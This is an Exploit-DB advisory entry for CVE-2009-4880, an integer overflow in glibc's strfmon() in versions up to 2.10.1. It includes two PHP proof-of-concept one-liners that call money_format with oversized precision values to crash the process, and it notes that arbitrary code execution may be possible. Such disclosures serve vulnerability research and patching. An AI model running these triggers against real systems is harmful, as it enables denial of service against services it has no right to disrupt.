GNU glibc 2.x - 'strfmon' Function Integer Overflow Weakness

2009-09-17T00:00:00
ID EDB-ID:33230
Type exploitdb
Reporter Maksymilian Arciemowicz
Modified 2009-09-17T00:00:00

Description

GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness. CVE-2009-4880. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/36443/info

GNU glibc is prone to an integer-overflow weakness.

An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

GNU glibc 2.10.1 and prior are vulnerable. 

The following proof-of-concept commands are available:

php -r 'money_format("%.1073741821i",1);'
php -r 'money_format("%.1343741821i",1);'